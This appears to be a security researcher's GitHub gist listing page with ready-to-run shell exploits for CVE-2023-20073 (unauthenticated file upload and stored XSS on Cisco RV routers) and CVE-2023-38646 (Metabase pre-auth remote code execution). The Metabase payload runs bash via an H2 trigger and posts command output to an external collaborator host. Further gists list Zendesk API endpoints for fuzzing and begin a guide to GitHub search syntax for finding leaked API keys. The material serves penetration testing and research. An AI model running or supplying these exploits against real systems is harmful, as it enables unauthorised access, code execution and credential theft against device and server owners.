Skip to content

Instantly share code, notes, and snippets.

View win3zz's full-sized avatar
♾️
{"amount":1,"amount":-1}

Bipin Jitiya win3zz

♾️
{"amount":1,"amount":-1}
129 followers · 0 following
View GitHub Profile
@win3zz
win3zz / CVE-2023-20073.sh
Created August 18, 2023 16:56
Unauthenticated Arbitrary File Upload and Stored XSS in Cisco RV340, RV340W, RV345, RV345P VPN Routers (CVE-2023-20073)
TARGET="https://0.0.0.0"; \
FILENAME="login.html"; \
echo "<b>CVE-2023-20073</b> exploit test.<br><script>alert('JS-test')</script>" > $FILENAME; \
curl -ksX POST "$TARGET/api/operations/ciscosb-file:form-file-upload" -H "Authorization: 1" -F "pathparam=Portal" -F "fileparam=${FILENAME}" -F "file.path=${FILENAME}" -F "file=@${FILENAME};type=application/octet-stream"; \
echo "Access the uploaded file through the following link: $TARGET/$FILENAME"
@win3zz
win3zz / CVE-2023-38646.sh
Created July 28, 2023 16:32
Metabase Pre-auth RCE (CVE-2023-38646)
TARGET="http://127.0.0.1:3000"; \
COLLABORATOR="http://xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oastify.com/"; \
COMMAND="uname -a"; \
ENCODED_COMMAND=$(echo -n "curl -X POST -d \"\$(${COMMAND})\" ${COLLABORATOR}" | base64 | tr -d '\n' | sed 's/=/%3D/g'); \
SETUP_TOKEN=$(curl -s "${TARGET}/api/session/properties" | jq -r '.["setup-token"]'); \
PAYLOAD='{"token":"'${SETUP_TOKEN}'","details":{"details":{"db":"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER test BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('\''bash -c {echo,'${ENCODED_COMMAND}'}|{base64,-d}|{bash,-i}'\'')\n$$--=x","advanced-options": false},"engine":"h2"}}'; \
curl -X POST -H "Content-Type: application/json" -d "${PAYLOAD}" "${TARGET}/api/setup/validate"
@win3zz
win3zz / zendesk_endpoints.txt
Created July 18, 2023 09:01
List of Zendesk API Endpoints for Fuzzing [Penetration Testing]
POST /api/v2/accounts
GET /api/v2/activities?since=cstest
GET /api/v2/audit_logs?filter[source_type]=cstest&filter[source_id]=1&filter[actor_id]=1&filter[ip_address]=cstest&filter[created_at]=cstest&filter[action]=cstest&sort_by=cstest&sort_order=cstest&sort=cstest
GET /api/v2/automations
POST /api/v2/automations
GET /api/v2/bookmarks
POST /api/v2/bookmarks
GET /api/v2/brands
POST /api/v2/brands
GET /api/v2/custom_objects
@win3zz
win3zz / GitHub-Leaked-API-Keys-and-Secrets.md
Last active April 22, 2025 15:19

GitHub Search Syntax for Finding API Keys/Secrets/Tokens

As a security professional, it is important to conduct a thorough reconnaissance. With the increasing use of APIs nowadays, it has become paramount to keep access tokens and other API-related secrets secure in order to prevent leaks. However, despite technological advances, human error remains a factor, and many developers still unknowingly hardcode their API secrets into source code and commit them to public repositories. GitHub, being a widely popular platform for public code repositories, may inadvertently host such leaked secrets. To help identify these vulnerabilities, I have created a comprehensive search list using powerful search syntax that enables the search of thousands of leaked keys and secrets in a single search.

Search Syntax:

(path:*.{File_extension1} OR path:*.{File_extension-N}) AND ({Keyname1} OR {Keyname-N}) AND (({Signature/pattern1} OR {Signature/pattern-N}) AND ({PlatformTag1} OR {PlatformTag-N}))

Examples:

**1.